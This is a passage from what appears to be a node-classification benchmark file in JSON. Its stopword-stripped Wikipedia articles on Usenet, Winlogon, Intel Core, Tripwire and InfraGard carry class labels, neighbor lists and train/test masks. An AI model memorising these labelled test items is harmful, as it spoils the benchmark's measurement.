pots network typically used transfers phone charges lower night format transmission usenet articles similar internet e-mail messages difference two usenet articles read user whose news server carries group message posted opposed email messages one specific recipients today usenet diminished importance respect internet forums blogs mailing lists social media usenet differs media several ways usenet requires personal registration group concerned information need stored remote server archives always available reading messages require mail web client news client however possible read participate usenet newsgroups large degree using ordinary internet browsers since newsgroups copied several internet sites groups alt.binaries still widely used data transfer many internet service providers many internet sites operate news servers users access isps operate servers directly often offer users account another provider specifically operates newsfeeds early news implementations server newsreader single program suite running system today one uses separate newsreader client software program resembles email client accesses usenet servers instead clients mozilla thunderbird outlook express provide abilities isps run news servers news server one difficult internet services administer large amount data involved small customer base compared mainstream internet services email web access disproportionately high volume customer support incidents frequently complaining missing news articles isp fault isps outsource news operation specialist sites usually appear user though isp ran server many sites carry restricted newsfeed limited number newsgroups commonly omitted newsfeed foreign-language newsgroups alt.binaries hierarchy largely carries software music videos images accounts 99 percent article data also usenet providers specialize offering service users whose isps carry news carry restricted feed see also news server operation overview news systems implemented newsgroups typically accessed newsreaders applications allow users read reply postings newsgroups applications act clients one news servers although historically usenet associated unix operating system developed newsreaders available major operating systems modern mail clients communication suites commonly also integrated newsreader often however integrated clients low quality compared standalone newsreaders incorrectly implement usenet protocols standards conventions many integrated clients example one microsoft outlook express disliked purists misbehavior rise world wide web www web front-ends web2news become common web front ends lowered technical entry barrier requirements one application usenet nntp server account numerous websites offering web based gateways usenet groups although people begun filtering messages made web interfaces one reason another google groups one web based front end web browsers access google groups via news protocol links directly minority newsgroups moderated meaning messages submitted readers distributed directly usenet instead emailed moderators newsgroup approval moderator receive submitted articles review inject approved articles properly propagated worldwide articles approved moderator must bear approved header line moderators ensure messages readers see newsgroup conform charter newsgroup though required follow rules guidelines typically moderators appointed proposal newsgroup changes moderators follow succession plan historically mod hierarchy existed usenet reorganization moderated newsgroups may appear hierarchy typically .moderated added group name usenet newsgroups big-8 hierarchy created proposals called request discussion rfd rfd required following information newsgroup name checkgroups file entry moderated unmoderated status group moderated least one moderator valid email address must provided information beneficial required includes charter rationale moderation policy group moderated discussion new newsgroup proposal follows finished members big-8 management board making decision vote either approve disapprove new newsgroup unmoderated newsgroups form majority usenet newsgroups messages submitted readers unmoderated newsgroups immediately propagated everyone see minimal editorial content filtering vs propagation speed form one crux usenet community one little cited defense propagation canceling propagated message usenet users use command news readers offer cancellation commands part article storage expires relatively short order anyway almost unmoderated usenet groups become collections spam usenet set protocols generating storing retrieving news articles resemble internet mail messages exchanging among readership potentially widely distributed protocols commonly use flooding algorithm propagates copies throughout network participating servers whenever message reaches server server forwards message network neighbors n't yet seen article one copy message stored per server server makes available demand typically local readers able access server collection usenet servers thus certain peer-to-peer character share resources exchanging granularity exchange however different scale modern peer-to-peer system characteristic excludes actual users system connect news servers typical client-server application much like email reader rfc 850 first formal specification messages exchanged usenet servers superseded rfc 1036 subsequently rfc 5536 rfc 5537 cases unsuitable content posted usenet support automated removal posting whole network creating cancel message although due lack authentication resultant abuse capability frequently disabled copyright holders may still request manual deletion infringing material using provisions world intellectual property organization treaty implementations united states online copyright infringement liability limitation act would require giving notice individual news server administrator internet usenet transported via network news transfer protocol nntp tcp port 119 standard unprotected connections tcp port 563 ssl encrypted connections offered sites major set worldwide newsgroups contained within nine hierarchies eight operated consensual guidelines govern administration naming current big eight see also great renaming alt hierarchy subject procedures controlling groups big eight result less organized groups alt hierarchy tend specialized specific—for example might newsgroup big eight contains discussions children books group alt hierarchy may dedicated one specific author children books binaries posted alt.binaries making largest hierarchies many hierarchies newsgroups distributed alongside regional language-specific hierarchies ne serve specific countries regions japan malta new england companies projects administer hierarchies discuss products offer community technical support historical hierarchy free software foundation microsoft closed newsserver june 2010 providing support products forums users prefer use term usenet refer big eight hierarchies others include alt well general term netnews incorporates entire medium including private organizational news systems informal sub-hierarchy conventions also exist *.answers typically moderated cross-post groups faqs faq would posted within one group cross post *.answers group head hierarchy seen refining information news group subgroups recursive—to point silliness alt.* usenet originally created distribute text content encoded 7-bit ascii character set help programs encode 8-bit values ascii became practical distribute binary files content binary posts due size often-dubious copyright status time restricted specific newsgroups making easier administrators allow disallow traffic oldest widely used encoding method binary content uuencode unix uucp package late 1980s usenet articles often limited 60,000 characters larger hard limits exist today files therefore commonly split sections require reassembly reader header extensions base64 quoted-printable mime encodings new generation binary transport practice mime seen increased adoption text messages avoided binary attachments operating systems metadata attached files use specialized encoding formats mac os binhex special mime types used lesser known encoding systems may used one time btoa xx encoding boo usr encoding attempt reduce file transfer times informal file encoding known yenc introduced 2001 achieves 30 reduction data transferred assuming 8-bit characters safely transferred across network without first encoding 7-bit ascii space common method uploading large binary posts usenet convert files rar archives create parchive files parity files used recreate missing data every part files reaches server news server generally allocates certain amount storage space post content newsgroup storage filled time new post arrives old posts deleted make room new content network bandwidth available server high storage allocation small possible huge flood incoming content overflow allocation push everything group flood large enough beginning flood begin deleted even last part flood posted binary newsgroups able function reliably sufficient storage allocated group allow readers enough time download parts binary posting flushed group storage allocation one time posting undesired content countered newsgroup would flooded random garbage data posts sufficient quantity push content suppressed compensated service providers allocating enough storage retain everything posted day including spam floods without deleting anything average length time posts able stay group deleted commonly called retention time generally larger usenet servers enough capacity archive several years binary content even flooded new data maximum daily speed available good binaries service provider must accommodate users fast connections 3 megabit also users slow connections 256 kilobit less need time download content period several days weeks major nsps retention time 4 years results 33 petabytes 33000 terabytes storage part long retention times well growing internet upload speeds usenet also used individual users store backup data practice called usenet backup ubackup commercial providers offer easy use online backup services storing data usenet free charge although access usenet may method requires user manually select prepare upload data anyone potentially download backup files data typically encrypted files uploaded uploader control files automatically copied usenet providers multiple copies spread different geographical locations around world—desirable backup scheme binary newsgroups used distribute completely legal user-created works open-source software public domain material binary groups used illegally distribute commercial software copyrighted media pornographic material isp-operated usenet servers frequently block access alt.binaries groups reduce network traffic avoid related legal issues commercial usenet service providers claim operate telecommunications service assert responsible user-posted binary content transferred via equipment united states usenet providers qualify protection dmca safe harbor regulations provided establish mechanism comply respond takedown notices copyright holders removal copyrighted content entire usenet network nearly impossible task due rapid propagation servers retention done server petitioning usenet provider removal removes one server retention cache others possible special post cancellation message distributed remove servers many providers ignore cancel messages standard policy easily falsified submitted anyone takedown petition effective across whole network would issued origin server content posted propagated servers removal content early stage would prevent propagation modern high speed links content propagated fast arrives allowing time content review takedown issuance copyright holders establishing identity person posting illegal content equally difficult due trust-based design network like smtp email servers generally assume header origin information post true accurate however smtp email usenet post headers easily falsified obscure true identity location message source manner usenet significantly different modern p2p services p2p users distributing content typically immediately identifiable users network address origin information usenet posting completely obscured unobtainable propagated past original server also unlike modern p2p services identity downloaders hidden view p2p services downloader identifiable others network address usenet downloader connects directly server server knows address connecting usenet providers keep usage logs make logged information casually available outside parties recording industry association america existence anonymising gateways usenet also complicates tracing postings true origin newsgroup experiments first occurred 1979 tom truscott jim ellis duke university came idea replacement local announcement program established link nearby university north carolina using bourne shell scripts written steve bellovin public release news form conventional compiled software written steve daniel truscott 1980 usenet connected arpanet connections usenet arpanet mark horton graduate student set connection began feeding mailing lists arpanet usenet fa arpanet identifier usenet gained 50 member sites first year including reed college university oklahoma bell labs number people using network increased dramatically however still longer usenet users could contribute arpanet uucp networks spread quickly due lower costs involved ability use existing leased lines x.25 links even arpanet connections 1983 thousands people participated 500 hosts mostly universities bell labs sites also growing number unix-related companies number hosts nearly doubled 940 1984 100 newsgroups existed 20 devoted unix computer-related topics least third recreation mesh uucp hosts rapidly expanded became desirable distinguish usenet subset overall network vote taken 1982 usenix conference choose new name name usenet retained established applied news name uucpnet became common name overall network addition uucp early usenet traffic also exchanged fidonet dial-up bbs networks mid-1990s almost 40,000 fidonet systems operation possible communicate millions users around world local telephone service widespread use usenet bbs community facilitated introduction uucp feeds made possible ms-dos implementations uucp ufgate uucp fidonet gateway fsuucp uupc 1986 rfc 977 provided network news transfer protocol nntp specification distribution usenet articles tcp/ip flexible alternative informal internet transfers uucp traffic since internet boom 1990s almost usenet distribution nntp early versions usenet used duke news software designed one two articles day matt glickman horton berkeley produced improved version called b news could handle rising traffic 50 articles day late 1983 message format offered compatibility internet mail improved performance became dominant server software c news developed geoff collyer henry spencer university toronto comparable b news features offered considerably faster processing early 1990s internetnews rich salz developed take advantage continuous message flow made possible nntp versus batched store-and-forward design uucp since time inn development continued news server software also developed usenet first internet community place many important public developments pre-commercial internet place tim berners-lee announced launch world wide web linus torvalds announced linux project marc andreessen announced creation mosaic browser introduction image tag revolutionized world wide web turning graphical medium many jargon terms common use internet originated popularized usenet likewise many conflicts later spread rest internet ongoing difficulties spamming began usenet sascha segan pc magazine said 2008 usenet dying years segan said people pointed eternal september 1993 beginning usenet decline segan believes pornographers software crackers began putting large non-text files usenet late 1990s usenet disk space traffic increased correspondingly internet service providers questioned needed host space pornography unauthorized software state new york opened investigation child pornographers used usenet many isps dropped usenet access access alt hierarchy response john biggs techcrunch said long folks think command line better mouse original text-only social network live aol discontinued usenet access 2005 may 2010 duke university whose implementation kicked usenet 30 years earlier decommissioned usenet server citing low usage rising costs 32 years usenet news service link university north carolina chapel hill news.unc.edu retired february 4 2011 time amount usenet traffic steadily increased number text posts made big-8 newsgroups averaged 1,800 new messages every hour average 25,000 messages per day however averages minuscule comparison traffic binary groups much traffic increase reflects increase discrete users newsgroup discussions instead combination massive automated spamming increase use .binaries newsgroups large files often posted publicly small sampling change measured feed size per day follows 2008 verizon communications time warner cable sprint nextel signed agreement attorney general new york andrew cuomo shut access sources child pornography time warner cable stopped offering access usenet verizon reduced access big 8 hierarchies sprint stopped access alt hierarchies stopped access alt.binaries hierarchies cuomo never specifically named usenet anti-child pornography campaign david dejean pc world said worry isps used cuomo campaign excuse end portions usenet access costly internet service providers high demand customers 2008 aol longer offered usenet access four providers responded cuomo campaign five largest internet service providers united states 50 u.s. isp marketshare june 8 2009 announced would longer provide access usenet service july 15 2009 aol announced would discontinue integrated usenet service early 2005 citing growing popularity weblogs chat forums on-line conferencing aol community tremendous role popularizing usenet 11 years earlier august 2009 verizon announced would discontinue access usenet september 30 2009 janet announced would discontinue usenet service effective july 31 2010 citing google groups alternative microsoft announced would discontinue support public newsgroups msnews.microsoft.com june 1 2010 offering web forums alternative primary reasons cited discontinuance usenet service general isps include decline volume actual readers due competition blogs along cost liability concerns increasing proportion traffic devoted file-sharing spam unused discontinued groups isps include pressure cuomo campaign child pornography one reasons dropping usenet feeds part services isps cox atlantic communications resisted 2008 trend eventually drop respective usenet feeds 2010 public archives usenet articles existed since early days usenet system created kenneth almquist late 1982 distributed archiving usenet posts suggested november 1982 scott orshan proposed every site keep articles posted forever also november year rick adams responded post asking anyone archived netnews anyone plan stating afraid admit started archiving 'useful newsgroups september 18 june 1982 gregory g. woodbury proposed automatic access archives system consisted automatic answering fixed-format messages special mail recipient specified machines 1985 two news archiving systems one rfc posted internet first system called keepnews mark m. swenson university arizona described program attempts provide sane way extracting keeping information comes usenet main advantage system allow users mark articles worthwhile retain second system ya news archiver chuq von rospach similar keepnews designed work much larger archives wonderful quadratic search time feature unix ... becomes real problem von rospach early 1985 posted detailed rfc archiving accessing usenet articles keyword lookup rfc described program could generate maintain archive usenet articles allow looking articles based article-id subject lines keywords pulled article also included c code internal data structure system desire fulltext search index archived news articles new either one request made april 1991 alex martelli sought build sort keyword index news archive early may mr. martelli posted summary responses usenet noting popular suggestion award must definitely go 'lq-text package liam quin recently posted alt.sources huge site http //asstr.org archives indexes erotic pornographic stories posted usenet group alt.sex.stories today archiving usenet led fear loss privacy archive simplifies ways profile people partly countered introduction x-no-archive yes header controversial web-based archiving usenet posts began 1995 deja news large searchable database 2001 database acquired google google groups hosts archive usenet posts dating back may 1981 earliest posts date may 1981 june 1991 donated google university western ontario help david wiseman others originally archived henry spencer university toronto zoology department archives late 1991 early 1995 provided kent landfield netnews cd series jürgen christoffel gmd archive posts march 1995 onward started company dejanews later deja purchased google february 2001 google began archiving usenet posts starting second week august 2000 google criticized vice wired contributors well former employees stewardship archive breaking search functionality usenet whole administrators server administrator free whatever pleases long end users peer servers tolerate accept nevertheless famous administrators",
    "neighbors": [
      6657,
      5634,
      2563,
      1028,
      7173,
      9736,
      9225,
      11274,
      3597,
      6171,
      2076,
      7709,
      9757,
      10270,
      7713,
      3618,
      10791,
      3629,
      9264,
      4661,
      3639,
      7739,
      2110,
      9283,
      8260,
      8773,
      589,
      5711,
      6231,
      8281,
      3676,
      1632,
      6242,
      5731,
      10850,
      6762,
      9325,
      10862,
      6772,
      119,
      7291,
      637,
      639,
      1664,
      1666,
      5251,
      1668,
      4229,
      3206,
      4741,
      6787,
      5264,
      2194,
      3218,
      3731,
      8341,
      10392,
      11418,
      1691,
      10910,
      1188,
      1702,
      6313,
      9391,
      4272,
      9908,
      9909,
      4799,
      205,
      7885,
      6352,
      8917,
      4310,
      2777,
      3804,
      6369,
      2786,
      10979,
      3813,
      4326,
      2281,
      9452,
      8429,
      11500,
      7921,
      756,
      9978,
      8443,
      7943,
      8978,
      10522,
      3366,
      4903,
      3884,
      3382,
      823,
      7488,
      11073,
      10057,
      3916,
      9550,
      850,
      4441,
      7515,
      4956,
      6492,
      3937,
      3428,
      6502,
      10601,
      5482,
      3435,
      8557,
      8558,
      11123,
      1908,
      5492,
      9588,
      3959,
      7544,
      11637,
      10110,
      3971,
      8582,
      8584,
      9097,
      4490,
      6028,
      8589,
      10126,
      5523,
      11674,
      5531,
      8092,
      10142,
      10149,
      2995,
      9141,
      5054,
      9151,
      8640,
      8644,
      3013,
      11212,
      5078,
      11228,
      3549,
      7134,
      8671,
      6112,
      10727,
      488,
      8169,
      494,
      5106,
      6133,
      2553,
      3578,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3351,
    "label": 4,
    "text": "Winlogon:winlogon computing winlogon component microsoft windows operating systems responsible handling secure attention sequence loading user profile logon optionally locking computer screensaver running requiring another authentication step actual obtainment verification user credentials left components winlogon common target several threats could modify function memory usage increased memory usage process might indicate hijacked windows vista later operating systems winlogon roles responsibilities changed significantly winlogon handles interface functions independent authentication policy creates desktops window station implements time-out operations versions windows prior windows vista provides set support functions gina takes responsibility configuring machine user group policy winlogon also checks copy windows legitimate license windows xp later versions winlogon following responsibilities",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      7207,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      93,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      5243,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      8418,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      7098,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      9187,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 3352,
    "label": 3,
    "text": "Intel_Core_(microarchitecture):intel core microarchitecture intel core microarchitecture previously known next-generation micro-architecture multi-core processor microarchitecture unveiled intel q1 2006 based yonah processor design considered iteration p6 microarchitecture introduced 1995 pentium pro high power consumption heat intensity resulting inability effectively increase clock speed shortcomings inefficient pipeline primary reasons intel abandoned netburst microarchitecture switched completely different architectural design delivering high efficiency small pipeline rather high clock speeds core microarchitecture never reached clock speeds netburst microarchitecture even moving 45 nm lithography however many generations successor microarchitectures developed core basis nehalem sandy bridge intel managed surpass clock speeds netburst using devil canyon improved version haswell microarchitecture reached base frequency 4 ghz maximum tested frequency 4.4 ghz using 22 nm lithography ultimately derives p6 microarchitecture core microarchitecture many succeeding improvements first processors used architecture code-named 'merom 'conroe 'woodcrest merom mobile computing conroe desktop systems woodcrest servers workstations architecturally identical three processor lines differ socket used bus speed power consumption mainstream core-based processors branded pentium dual-core pentium low end branded celeron server workstation core-based processors branded xeon intel first 64-bit desktop mobile core-based processors branded core 2 core microarchitecture returned lower clock rates improved usage available clock cycles power compared preceding netburst microarchitecture pentium 4/d-branded cpus core microarchitecture provides efficient decoding stages execution units caches buses reducing power consumption core 2-branded cpus increasing processing capacity intel cpus varied widely power consumption according clock rate architecture semiconductor process shown cpu power dissipation tables like last netburst cpus core based processors feature multiple cores hardware virtualization support marketed intel vt-x well intel 64 ssse3 however core-based processors hyper-threading technology found pentium 4 processors core microarchitecture descendant p6 microarchitecture used pentium pro pentium ii pentium iii pentium m. l1 cache size enlarged core microarchitecture 32 kb pentium ii iii 16 kb l1 data 16 kb l1 instruction 64 kb l1 cache/core 32 kb l1 data 32 kb l1 instruction pentium core/core 2 consumer version also lacks l3 cache found gallatin core pentium 4 extreme edition though exclusively present high-end versions core-based xeons l3 cache hyper-threading reintroduced consumer line nehalem microarchitecture core microarchitecture major architectural revision based part pentium processor family designed intel israel penryn pipeline 12–14 stages long — less half prescott signature feature wide order execution cores penryn successor nehalem borrowed heavily pentium 4 20-24 pipeline stages core execution unit 4 issues wide compared 3-issue cores p6 pentium 2-issue cores netburst microarchitectures new architecture dual core design linked l1 cache shared l2 cache engineered maximum performance per watt improved scalability one new technology included design macro-ops fusion combines two x86 instructions single micro-operation example common code sequence like compare followed conditional jump would become single micro-op unfortunately technology work 64-bit mode new technologies include 1 cycle throughput 2 cycles previously 128-bit sse instructions new power saving design components run minimum speed ramping speed dynamically needed similar amd cool n'quiet power-saving technology well intel speedstep technology earlier mobile processors allows chip produce less heat consume little power possible woodcrest cpus front side bus fsb runs 1333 mt/s however scaled 1066 mt/s lower end 1.60 1.86 ghz variants merom mobile variant initially targeted run fsb 667 mt/s second wave meroms supporting 800 mt/s fsb released part santa rosa platform different socket may 2007 desktop-oriented conroe began models fsb 800 mt/s 1066 mt/s 1333 mt/s line officially launched july 22 2007 power consumption new processors extremely low—average use energy consumption 1–2 watt range ultra low voltage variants thermal design powers tdps 65 watts conroe woodcrests 80 watts 3.0 ghz woodcrest 40 watts low-voltage woodcrest comparison amd opteron 875he processor consumes 55 watts energy efficient socket am2 line fits 35 watt thermal envelope specified different way directly comparable merom mobile variant listed 35 watts tdp standard versions 5 watts tdp ultra low voltage ulv versions previously intel announced would focus power efficiency rather raw performance however idf spring 2006 intel advertised promised numbers processors core microarchitecture categorized number cores cache size socket combination unique code name product code used across number brands instance code name allendale product code 80557 two cores 2 mb l2 cache uses desktop socket 775 marketed celeron pentium core 2 xeon different sets features enabled mobile desktop processors come two variants differ size l2 cache specific amount l2 cache product also reduced disabling parts production time wolfdale-dp quad-core processors except dunnington qc multi-chip modules combining two dies 65 nm processors product code shared processors different dies specific information one used derived stepping original core 2 processors based around dies identified cpuid family 6 model 15 depending configuration packaging code names conroe lga 775 4 mb l2 cache allendale lga 775 2 mb l2 cache merom socket 4 mb l2 cache kentsfield multi-chip module lga 775 2x4mb l2 cache merom allendale processors limited features found pentium dual core celeron processors conroe allendale kentsfield also sold xeon processors additional code names processors based model woodcrest lga 771 4 mb l2 cache clovertown mcm lga 771 2×4mb l2 cache tigerton mcm socket 604 2×4mb l2 cache marketed xeon brand conroe-l merom-l processors based around core conroe merom contain single core 1 mb l2 cache significantly reducing production cost power consumption processor expense performance compared dual-core version used ultra-low voltage core 2 solo u2xxx celeron processors identified cpuid family 6 model 22 intel tick-tock cycle 2007/2008 tick shrink core microarchitecture 45 nanometers cpuid model 23 core 2 processors used code names penryn socket p wolfdale lga 775 yorkfield mcm lga 775 also sold celeron pentium xeon processors xeon brand wolfdale-dp harpertown code names used lga 771 based mcms two four active wolfdale cores architecturally 45nm core 2 processors feature sse4.1 new divide/shuffle engine chips come two sizes 6 mb 3 mb l2 cache smaller version commonly called penryn-3m wolfdale-3m well yorkfield-6m respectively single-core version penryn listed penryn-l separate model like merom-l version penryn-3m model one active core xeon dunnington processor cpuid family 6 model 29 closely related wolfdale comes six cores on-chip l3 cache designed servers socket 604 marketed xeon core 2 core microarchitecture uses number steppings unlike previous microarchitectures represent incremental improvements also different sets features like cache size low power modes steppings used across brands typically disabling features limiting clock frequencies low-end chips steppings reduced cache size use separate naming scheme means releases longer alphabetic order additional steppings used internal engineering samples listed tables many high-end core 2 xeon processors use multi-chip modules two three chips order get larger cache sizes two cores early es/qs steppings b0 cpuid 6f4h b1 6f5h e0 6f9h steppings b2/b3 e1 g0 model 15 cpuid 06fx processors evolutionary steps standard merom/conroe die 4 mib l2 cache short-lived e1 stepping used mobile processors stepping l2 m0 allendale chips 2 mib l2 cache reducing production cost power consumption low-end processors g0 m0 steppings improve idle power consumption c1e state add c2e state desktop processors mobile processors support c1 c4 idle states steppings e1 g0 m0 add support mobile intel 965 express santa rosa platform socket p earlier b2 l2 steppings appear socket based mobile intel 945 express napa refresh platform model 22 stepping a1 cpuid 10661h marks significant design change single core 1 mib l2 cache reducing power consumption manufacturing cost low-end like earlier steppings a1 used mobile intel 965 express platform steppings g0 m0 a1 mostly replaced older steppings 2008 2009 new stepping g2 introduced replace original stepping b2 model 23 cpuid 01067xh intel started marketing stepping full 6 mib reduced 3 mib l2 cache time giving identical cpuid values steppings new sse4.1 instructions stepping c1/m1 bug fix version c0/m0 specifically quad core processors used stepping e0/r0 adds two new instructions xsave/xrstor replaces earlier steppings mobile processors stepping c0/m0 used intel mobile 965 express santa rosa refresh platform whereas stepping e0/r0 supports later intel mobile 4 express montevina platform model 30 stepping a1 cpuid 106d1h adds l3 cache well six instead usual two cores leads unusually large die size 503 mm² february 2008 found way high-end xeon 7400 series dunnington conroe conroe xe allendale use socket lga 775 however every motherboard compatible processors supporting chipsets yorkfield xe model qx9770 45 nm 1600 mt/s fsb limited chipset compatibility x38 p35 overclocking high-performance x48 p45 motherboards compatible bios updates gradually released provide support penryn technology qx9775 compatible intel d5400xs motherboard wolfdale-3m model e7200 also limited compatibility least xpress 200 chipset incompatible although motherboard may required chipset support conroe motherboards based above-mentioned chipsets support conroe conroe-based processors require new power delivery feature set specified voltage regulator-down vrd 11.0 requirement result conroe significantly lower power consumption compared pentium 4/d cpus replaced motherboard supporting chipset vrd 11 supports conroe processors even boards need updated bios recognize conroe fid frequency id vid voltage id unlike previous pentium 4 pentium design core 2 technology sees greater benefit memory running synchronously front side bus fsb means conroe cpus fsb 1066 mt/s ideal memory performance ddr2 pc2-8500 configurations using pc2-5300 instead pc2-4200 actually decrease performance going pc2-6400 significant performance increase ddr2 memory models tighter timing specifications improve performance difference real world games applications often negligible optimally memory bandwidth afforded match bandwidth fsb say cpu 533 mt/s rated bus speed paired ram matching rated speed example ddr2 533 pc2-4200 common myth installing interleaved ram offer double bandwidth however increase bandwidth installing interleaved ram roughly 5–10 agtl+ psb used netburst processors well current medium-term pre-quickpath core 2 processors provide 64-bit data path current chipsets provide couple either ddr2 ddr3 channels jobs requiring large amounts memory access quad-core core 2 processors benefit significantly using pc2-8500 memory runs exactly speed cpu fsb officially supported configuration number motherboards support core 2 processor require use ddr2 intel 975x p965 chipsets require memory motherboards chipsets support core 2 processors ddr memory using ddr memory performance may reduced lower available memory bandwidth core 2 memory management unit mmu x6800 e6000 e4000 processors operate previous specifications implemented previous generations x86 hardware may cause problems many serious security stability issues existing operating system software intel documentation states programming manuals updated coming months information recommended methods managing translation lookaside buffer tlb core 2 avoid issues admits rare instances improper tlb invalidation may result unpredictable system behavior hangs incorrect data among issues stated intel errata ax39 ax43 ax65 ax79 ax90 ax99 said particularly serious 39 43 79 cause unpredictable behavior system hang fixed recent steppings among stated errata particularly serious openbsd theo de raadt dragonfly bsd matthew dillon taking contrasting view linus torvalds calling tlb issue totally insignificant adding biggest problem intel documented tlb behavior better microsoft issued update kb936357 address errata microcode update performance penalty bios updates also available fix issue",
    "neighbors": [
      7173,
      4108,
      9741,
      5649,
      6175,
      2088,
      2604,
      6192,
      7218,
      2638,
      1119,
      3175,
      4204,
      8820,
      630,
      4217,
      8325,
      7313,
      8851,
      6804,
      9391,
      4276,
      2237,
      5309,
      6339,
      6352,
      5844,
      5356,
      4334,
      5871,
      1776,
      3317,
      5883,
      5380,
      5386,
      6924,
      6926,
      4886,
      3352,
      3882,
      3883,
      7983,
      10548,
      6463,
      5444,
      9541,
      8523,
      5503,
      3457,
      3459,
      3973,
      9095,
      9611,
      398,
      8590,
      5523,
      9111,
      3992,
      10669,
      10675,
      1461,
      8125,
      8126,
      7105,
      9157,
      1998,
      977,
      5073,
      2525,
      7134,
      1000,
      7657,
      9707,
      1515,
      8684,
      10734,
      7151,
      499,
      4603
    ],
    "mask": "None"
  },
  {
    "node_id": 3353,
    "label": 4,
    "text": "Tripwire_(company):tripwire company tripwire inc. software company based portland oregon develops markets sells information technology security compliance automation graduate student purdue university gene kim tripwire co-founder former chief technology officer along professor gene spafford created initial version software 1992 academic source release pioneered many techniques used intrusion detection received widespread support among corporate education government security professionals 1997 gene kim co-founded tripwire inc rights tripwire name technology attained commercial version product tripwire servers released soon thereafter 2000 tripwire contributed source code functionally equivalent academic source release open source community enable open source tripwire 2005 tripwire released first version tripwire enterprise company flagship product designed help organizations configuration control detecting assessing reporting remediating file configuration changes january 2010 tripwire announced release tripwire log center log security information event management siem software stores correlates reports log security event data two products integrated enable correlation change event data august 21 2009 tripwire acquired activeworx technologies crosstec corporation includes log center security center event management snort management center revenues grew 74 million 2009 october 2009 company 261 employees number grew 336 june 2010 may–june 2010 company 5,500 customers announced filed registration statement securities exchange commission proposed initial public offering common stock year later company announced sale private equity firm thoma bravo llc ending 86 million ipo plans ceo jim johnson cited firm failure reach 100 million revenue milestone 2010 well changing ipo market expectations reasons going ipo day following acquisition company laid 50 350 employees johnson expects company eventually go public though unlikely happen 2015 acquisition ncircle 2013 tripwire added asset discovery vulnerability management portfolio tripwire ip360™ enables organizations identify system vulnerabilities advanced intelligence prioritizes critical issues fix december 2014 belden inc announced plans buy tripwire 710 million acquisition completed january 2 2015",
    "neighbors": [
      6372,
      3112,
      2538,
      687,
      9049
    ],
    "mask": "Test"
  },
  {
    "node_id": 3354,
    "label": 4,
    "text": "InfraGard:infragard infragard non-profit organization serving public-private partnership u.s. businesses federal bureau investigation organization information sharing analysis effort serving interests combining knowledge base wide range private sector government members infragard association individuals facilitates information sharing intelligence businesses academic institutions state local law enforcement agencies participants dedicated prevent hostile acts united states infragard mutual nondisclosure agreements among members individuals fbi promotes trusted discussions vulnerabilities solutions companies individuals may hesitant place public domain provide access additional threat information fbi infragard began cleveland ohio field office 1996 since expanded become national-level program infragard coordinators every fbi field office originally local effort gain support information technology industry academia fbi investigative efforts cyber arena since expanded much wider range activities surrounding nation critical infrastructure program expanded fbi field offices 1998 fbi assigned national program responsibility infragard former national infrastructure protection center nipc directed radm james b. plehal fbi cyber division 2003 since 2003 infragard alliances fbi said developed trust-based public-private sector partnership ensure reliability integrity information exchanged various terrorism intelligence criminal security matters supports fbi priorities areas counterterrorism foreign counterintelligence cybercrime infragard focused protecting 16 critical infrastructures outlined presidential directive 21 critical infrastructure security resilience sharing threat information assisting fbi finding prosecuting attack critical infrastructure physical cyber means provide training active shooter scenarios cyber defense threats nation organization committed providing tools resources needed operate nation critical infrastructure protect enterprises maintain services necessary safe prosperous nation infragard chapters also participate assure critical infrastructure owners operators—estimated 85 private sector—are engaged represented local regional planning efforts working 16 critical infrastructure sectors organization provides resources information prevention also building resilience response capabilities infragard chapters around nation also provide cyber physical security training sessions focus latest threats identified fbi sessions include threat briefings technical sessions cyber physical attack vectors response training resources help cisos csos protect enterprise infragard approaches threats critical infrastructure tactical strategic level addressing needs front lines security well decision makers tasked assessing enterprise vulnerabilities allocating resources protect information sharing organization government criticized protecting civil liberties concerned membership would surrogate eyes ears fbi group also subject hacking attacks intended embarrass fbi local chapters regularly meet discuss latest threats listen talks subject matter experts security issues membership open u.s. citizens cost july 2012 organization reported membership 54,677 including fbi infragard focuses development management protection critical infrastructure infragard nationwide focus group reviews threats could disrupt critical infrastructure nationwide month named electromagnetic pulse special interest group emp sig all-hazards approach looks manmade natural electromagnetic pulse emp cyber attack coordinated physical attack pandemics insider threats mitigating actions could minimize threats mitigation strategies include hardening prevention strategies addition development local infrastructure could make local communities robust sustainable see emp sig press release guidance document see also website association universities involved public policy policy studies organization produces technology policy conference called dupont summit infragard national emp sig brought public private sector leaders discuss emerging threat issues http //www.ipsonet.org/conferences/the-dupont-summit/dupont-summit-2012/infragard-emp-sig partnerships government agencies private organizations critics concerned civil liberties american civil liberties union aclu warned evidence infragard may closer corporate tips program turning private-sector corporations — may position observe activities millions individual customers — surrogate eyes ears fbi concluding program institutionalizes close secretive ties organizations raises serious questions scope activities future others describing infragard state architecture internet—and many possible methods attack— requires governments corporations private parties work together protect network security head threats occur responding aclu criticism chairwoman kathleen kiernan infragard national members alliance inma denies infragard anything beneficial americans stating elitist group way shape form says 're trying protect everybody u.s. citizen planet eligible apply infragard 2011 lulzsec claimed responsibility attacking chapter websites managed local members connecticut atlanta order embarrass fbi simple hacks group leaked infragard member e-mails database local users group defaced website posting following message let flow stupid fbi battleships accompanied video lulzsec posted following message regarding attack",
    "neighbors": [
      7600,
      4945,
      4625,
      10935,
      4956,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 3355,
    "label": 7,
